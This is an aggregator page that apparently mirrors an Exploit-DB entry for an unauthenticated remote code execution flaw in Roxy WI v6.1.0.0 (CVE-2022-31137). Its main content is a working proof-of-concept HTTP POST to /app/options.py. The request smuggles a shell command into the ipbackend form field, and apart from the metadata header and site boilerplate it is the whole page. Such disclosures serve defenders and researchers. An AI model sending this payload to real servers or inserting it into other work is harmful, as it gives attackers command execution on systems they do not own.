4
[webapps] Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via sub...
source link: https://www.exploit-db.com/exploits/51481
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
# Exploit Author: Iyaad Luqman K
# Application: Roxy WI <= v6.1.0.0
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31137
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close
show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK